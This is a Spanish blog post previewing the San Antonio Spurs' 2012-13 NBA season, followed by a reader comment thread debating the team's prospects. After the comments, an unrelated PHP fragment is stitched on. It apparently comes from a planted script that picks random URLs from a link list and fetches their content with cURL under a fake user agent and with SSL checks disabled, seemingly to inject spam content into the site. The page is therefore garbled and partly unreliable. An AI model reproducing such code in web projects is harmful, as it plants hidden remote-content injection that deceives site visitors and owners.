San Antonio Spurs: ¿Punto final? ..

31 de October de 2012 por Hynreck

“…lo peor del amor es cuando pasa,
cuando al punto final de los finales
no le quedan dos puntos suspensivos…”

Nuevo año, nuevo entierro. ¿Cuántas veces habremos cometido este mismo error en las últimas 10 temporadas?. Qué injustos somos con Popovich y sus chicos. Osamos decir que este equipo ya no da más de sí, que sus 3 magníficos tienen demasiada edad como para poder competir al máximo nivel, que deberían comenzar una reconstrucción, que la diferencia con los gallos de la liga es demasiada… pero todos los años nos sorprenden, siempre compiten al máximo y nadie querría encontrarse con ellos en una serie.

El mejor PF de todos los tiempos, Tim Duncan (en pie por favor), ha renovado su contrato por la mitad de su salario anterior para dos temporadas con opción a una tercera y Manu Ginobili es posible que haga lo mismo de cara a la temporada que viene. Estas 2 renovaciones unidas al expiring de Stephen Jackson, aliviarán sobremanera las arcas de los Spurs, permitiéndoles mantener la base del equipo y poder renovarse en la agencia libre. 

El único contrato de larga duración que les queda es el de Tony Parker. 37’5 millones ha de cobrar hasta 2015. No es un contrato barato pero tampoco es demasiado excesivo para uno de los mejores bases de la liga. Parker seguirá a lo suyo, penetrando como cuchillo en mantequilla en las defensas rivales para anotar y distribuyendo juego para disfrute de Duncan y compañía.

A su lado, aunque no de inicio, Manu Ginobili ejercerá de colíder del equipo. No le descubriremos ahora, fundamentos y dedicación para un jugador a menudo infravalorado. Capaz de sacrificarse en defensa e implacable en ataque. Manudona, el zurdo de oro, verá el 20 colgado del AT&T Center en cuanto se retire.

Y cómo no, la tercera pata del banco es el eterno Tim Duncan. La edad no perdona y sus números decrecen según pasan las temporadas pero con una buena dosificación y llegando descansado a playoffs será un jugador dominante una vez más.

De darle descanso y acompañarle en la pintura se encargarán los Boris Diaw, Tiago Splitter, DeJuan Blair y Matt Bonner. Cada uno ofrecerá algo diferente: la versatilidad de Diaw, la fuerza de Blair, el tiro externo de Bonner… De Splitter se espera un paso adelante para demostrar por qué era el mejor center de Europa.

La sombra de Bruce Bowen (quién lo iba a decir) es alargada, pero Popovich cree haber encontrado en Danny Green a un jugador con unas prestaciones similares, el tipo de escolta defensivo cada vez más proliferante en la NBA. El sorprendente Gary Neal ha perdido un poco su sitio tras un gran primer año como rookie y debería partir como tercer SG del equipo.

Los Spurs apostaron fuerte el curso pasado por Kawhi Leonard y éste se hizo rápidamente con el puesto de SF titular. Gran defensor y sin demandar protagonismo ofensivo es otro de esos jugadores de rol que tanto le gustan a Popovich. Se repartirá los minutos en el puesto de 3 con otro jugador curtido en mil batallas como Stephen Jackson. Un S-Jax motivado es uno de los jugadores más competitivos de la liga. Intenso, desafiante y con carácter, su personalidad ha jugado en su contra en ocasiones, pero bien encauzada se convierte en un arma tremenda.

La única alta de la plantilla es la del ex valencianista Nando de Colo. Alternará los puestos de 1 y 2 según las necesidades del equipo, mientras que el aussie Patty Mills aportará tiro exterior en momentos puntuales.

Los Spurs llevan dando los últimos coletazos desde hace 6 años pero la experiencia hace que nadie les pueda dar por muertos. “Nunca subestimes el corazón de un campeón”, Rudy Tomjanovich dijo una gran verdad. San Antonio no parte como favorito, la base es la misma, sus estandartes un año más viejos y todo parece indicar que no será su año, la lógica nos dice que los 50 mejores partidos de sus estrellas ya han pasado, pero ¿quién se atreve a decir que este es el punto final? Nosotros por lo menos…

Titulares: Tony Parker – Danny Green – Kawhi Leonard -Tim Duncan – Boris Diaw
Sexto hombre: Manu Ginobili

Pronóstico: Cuartos del Oeste, Semifinales de conferencia.

Comenta

14 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    El que dé a la dupla Popovich-Duncan por muerta se la va a pegar bien pegada…como siempre. Esos 2 junto a Manu y Parker son la receta perfecta de efectividad.
    Pop sabe sacar lo mejor de jugadores que en otras plantillas no entrarían en la rotación.
    Que nadie dude que volverán a estar ahí hasta que, como el año pasado, se les termine la gasolina.
    De ser los Lakers u Oklahoma intentaría evitarlos a toda costa en Playoffs porque pueden darles un disgusto

      Citar

  2. Pcerezo dice:
    #2

    Creo que Daimiel dio en la diana, estos Spurs prefieren acabar su carrera sin sobresaltos, siendo felices, disfrutando de los momentos que les queda de baloncesto. Ya tendrán tiempo de reconstuir.
    Han dado tanto por el baloncesto que ya están por encima del bien y del mal. Hasta donde lleguen lo harán sin escatimar una gota de esfuerzo, como siempre han hecho, pero en el fondo saben que no les llega para luchar contra OKC, Miami o Lakers, pero eso sí, que les quiete y nos quiten lo bailao… el que venga detrás que iguale lo que han hecho.

      Citar

  3. Laker1624 dice:
    #3

    Aunque pienso que han sido el mejor equipo de la decada pasada y uno de los mejores equipos de la historia, este año no les veo peleando por el titulo. Aunque ahora por ahora en la conferecia oeste, a la espera de lo que hagan los Lakers en la RS, solo veo a los Thunder superiores en una hipotetica eliminatoria de Playoffs. En todo caso pienso que siguen siendo un equipo de leyenda con una experiencia en Playoffs como la que no tiene ningun otro equipo en la liga y que ademas cuentan con un mito como Duncan que estoy convencido que aumentara sus prestaciones en las eliminatorias por el titulo, donde venderan muy cara su piel.

      Citar

  4. Sancho88 dice:
    #4

    Simplemente, chapó por el análisis, me parece muy acertado en todos los aspectos, y hace justicia a un equipo que, como bien decís, no puede ser analizado igual que el resto. A los Spurs les pasa como a los Celtics, se han ganado un halo de respetabilidad por lo que han hecho en la cancha, y enterrarlos no tiene ningún sentido. Sobre todo, porque no sería realista. Lo que más mola de estos equipos es comprobar las listas históricas en anotación, rebotes ofensivos, asistencias, tapones, robos y demás y empezar a ver muchos Duncan y Garnetts por ahí, y no querer que se retiren jamás… No obstante, lo bueno se acaba, y habrá que disfrutarlo mientras dure

      Citar

  5. nba dice:
    #5

    La clave de de estos Spurs es, si como se comenta en el analisis Splitter da mas de si, que todavia se le espera.
    Del resto de componentes ya sabes que siempren cumplen con las espectativas, pero a Thiago digamos que todavia no se ha puesto el mono de trabajo, si lo consigue a mas de un galllito les dara la sorpresa

      Citar

  6. Denise dice:
    #6

    Pues yo les doy la ultima plaza de Playoffs del Oeste y como haya alguna lesion minimamente importante de su Big 3, se quedan fuera.
    No me gusta la composición del equipo, la plantilla es cortisima; 2 de los 3 grandes ya están en las últimas; veteranos como Diaw o Jackson no les veo buenas piezas para equipos contenders; en Splitter he perdido la confianza en que sea un pivot cercano al 20-10; si Parker se lesiona, De Colo y Mills no tienen mucho nivel.
    En fin, dependerán bastante de la evolución de buenos jovenes jugadores como Green y Leonard; y si Neal mantiene la buena línea que tuvo hace 2 años.

    Pronostico: 8º del Oeste con posibilidad de que Utah o GSW les quite la ultima plaza de PO

      Citar

  7. Sancho88 dice:
    #7

    No veo por qué se van a quedar fuera Denise. Parker fue el mejor base de la NBA el año pasado, a pesar de que esta liga puso a Paul por delante, a pesar de que el propio Parker se merendase ne playoffs a Paul. Luego, Manu con sus 25 minutos te puede arreglar un partido él solo, y Timmy algo parecido. Además, los jóvenes que tienen parecen tipos disciplinados que pueden trabajar muy bien con Popo. Creo que están muy lejos de quedarse fuera este año. Que me digas que pueden llegar a ser carne de primera ronda ante Clippers, Lakers, OKC, Memphis, Denver, ok, pero si consiguen ser cabezas de serie, veo esto difícil.

      Citar

  8. Denise dice:
    #8

    Es mi opinión, no digo que sea una verdad absoluta. En una serie los veo peligrosos, pero a 82 partidos…bff, OKC, Lakers, Clippers, Nuggets, y Memphis tienen para mí claramente mejor equipo. Después están los Mavs y los Wolves con equipos bastante profundos; por lo que creo que la ultima plaza se la jugaran entre Spurs, Jazz y GSW, dandosela a los texanos por aquello de la experiencia.

    A ver, la posición de base: Parker-De Colo y Mills: Parker es un seguro de vida, pero mas alla de él, no hay nada. Lo siento, pero De Colo me parece un jugador bastante normalito incluso en Europa; y Mills es un tio de rachas mas anotador que distribuidor. No gran cosa.

    Alas; Ginobili-Jackson-Green-Leonard-Neal: Los 2 primeros pueden asustar por nombre, pero son demasiado veteranos, ya no están para liderar equipos. Los otros 3, Green, Leonard y Neal son buenos jugadores de equipo que me gustan, aunque no creo que evolucionen y den un paso tan adelante para echarse un equipo a las espaldas.

    Pintura: Duncan-Splitter-Diaw-Blair-Bonner
    Tim creo que lo van a tener que dosificar mucho, ya no puede contra las salvajes pinturas del Oeste, si no quiere ir arrastrandose, este año debería retirarse, como jugador franquicia, está acabado.
    Diaw es Diaw, te da una de cal y otra de arena, y en los ultimos años se le ha visto gordo, lento y sin mucho que ofrecer. Splitter como dije, ya no le espero, se le ha pasado el arroz para convertirse en un jugador Top, culpa tambien de Popovych que no le ha dado mucha bola. Bonner, solo tira de 3 y poco más; y Blair le pones huevos pero fisicamente está muy limitado por la altura.

    Como digo, a 7 partidos podrían cargarse a quien sea, con Duncan, Ginobili y otros veteranos descansando cada 4 días como en Playoffs; a 82 partidos de Regular, los veo una plantilla excesivamente corta, veterana, lenta y con muy poco físico. De las peorcitas en la NBA en cuanto a físico se refiere.

      Citar

  9. lost dice:
    #9

    Pop junto a D’Antoni me parecen los entrenadores que más rendimiento a sus jugadores, pero el estilo, el carácter y la agresividad del equipo de Pop siempre ha sido mucho mejor que cualquier equipo de D’Antoni.

      Citar

  10. rumbero dice:
    #10

    Yo los veo entre los 4 primeros casi seguro. No hay que olvidar que han sido primeros de conferencia los dos últimos años. Popovich sabe administrar como nadie a la plantilla durante la regular además que tiene esa marmita a lo Obelix donde mete al trio maravilla para que no pasen los años para ellos. Lo dicho, les falta un punto para ser candidatos pero ningun equipo quiere cruzarse con ellos

      Citar

  11. Jabho dice:
    #11

    Salvo lesión gorda de uno de los 3 también les veo entre los 4-5 primeros del Oeste… Pero no les veo para mucho más.

    A los pies de Duncan y de Popo.

    Leonard es un muy buen jugador, pero no creo que de para estrella de ningún equipo. Al menos para estrella en anotación. Puede tener una carrera similar Battier, incluso algo mejor, que no es moco de pavo… pero ese tipo de jugador,.

      Citar

  12. David dice:
    #12

    Denise…. Mills malo? Leonard y Green mediocres? Buahh tío…. No te gusta nada San Antonio y te niegas a aceptar que son un EQUIPO. Que si no es uno, es otro el que te la lía… Y que Kahwi tiene cualidades para acabar siendo un tío muy importante en la NBA…

      Citar

  13. nba dice:
    #13

    Denise:
    Es mi opinión, no digo que sea una verdad absoluta. En una serie los veo peligrosos, pero a 82 partidos…bff, OKC, Lakers, Clippers, Nuggets, y Memphis tienen para mí claramente mejor equipo. Después están los Mavs y los Wolves con equipos bastante profundos; por lo que creo que la ultima plaza se la jugaran entre Spurs, Jazz y GSW, dandosela a los texanos por aquello de la experiencia.

    A ver, la posición de base: Parker-De Colo y Mills: Parker es un seguro de vida, pero mas alla de él, no hay nada. Lo siento, pero De Colo me parece un jugador bastante normalito incluso en Europa; y Mills es un tio de rachas mas anotador que distribuidor. No gran cosa.

    Alas; Ginobili-Jackson-Green-Leonard-Neal: Los 2 primeros pueden asustar por nombre, pero son demasiado veteranos, ya no están para liderar equipos. Los otros 3, Green, Leonard y Neal son buenos jugadores de equipo que me gustan, aunque no creo que evolucionen y den un paso tan adelante para echarse un equipo a las espaldas.

    Pintura: Duncan-Splitter-Diaw-Blair-Bonner
    Tim creo que lo van a tener que dosificar mucho, ya no puede contra las salvajes pinturas del Oeste, si no quiere ir arrastrandose, este año debería retirarse, como jugador franquicia, está acabado.
    Diaw es Diaw, te da una de cal y otra de arena, y en los ultimos años se le ha visto gordo, lento y sin mucho que ofrecer. Splitter como dije, ya no le espero, se le ha pasado el arroz para convertirse en un jugador Top, culpa tambien de Popovych que no le ha dado mucha bola. Bonner, solo tira de 3 y poco más; y Blair le pones huevos pero fisicamente está muy limitado por la altura.

    Como digo, a 7 partidos podrían cargarse a quien sea, con Duncan, Ginobili y otros veteranos descansando cada 4 días como en Playoffs; a 82 partidos de Regular, los veo una plantilla excesivamente corta, veterana, lenta y con muy poco físico. De las peorcitas en la NBA en cuanto a físico se refiere.

    No se Denise, visto lo visto,espues de ver como han perdido los Lakers dos partidos seguidos, creo que los Lakers pueden tener mejores jugadores en determinadas posiciones, pero mejor “equipo” como no sea en un universo paralelo en el que alguien de los Lakers defiende algo, me parece dificil

      Citar

  14. Denise dice:
    #14

    @David: Mills, en mi opinion, es un jugador inconsistente e irregular, un jugador de rachas. Un día te puede arreglar un partido metiendo 20 puntos, pero por lo general, es un jugador para ser bueno en Europa; en la NBA no tiene mucho sitio en un proyecto ganador.

    Sobre Leonard y Green, si lees mi opinión detenidamente, verás que digo que me gustan, son buenos jugadores de equipo, pero joder, ninguno vale ni como escuderos, no son jugadores para echarse una plantilla a la espalda.

    Ya me llevaré zas en la boca o no, el tiempo lo dirá, pero a mi para una temporada regular de 82 partidos, creo que fisicamente van a sufrir mucho para conseguir una plaza de playoffs.

    @nba: no seas tan derrotistas, aqui pasamos del blanco al negro y viceversa en 2 dias; ni que los Lakers fueran una banda…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>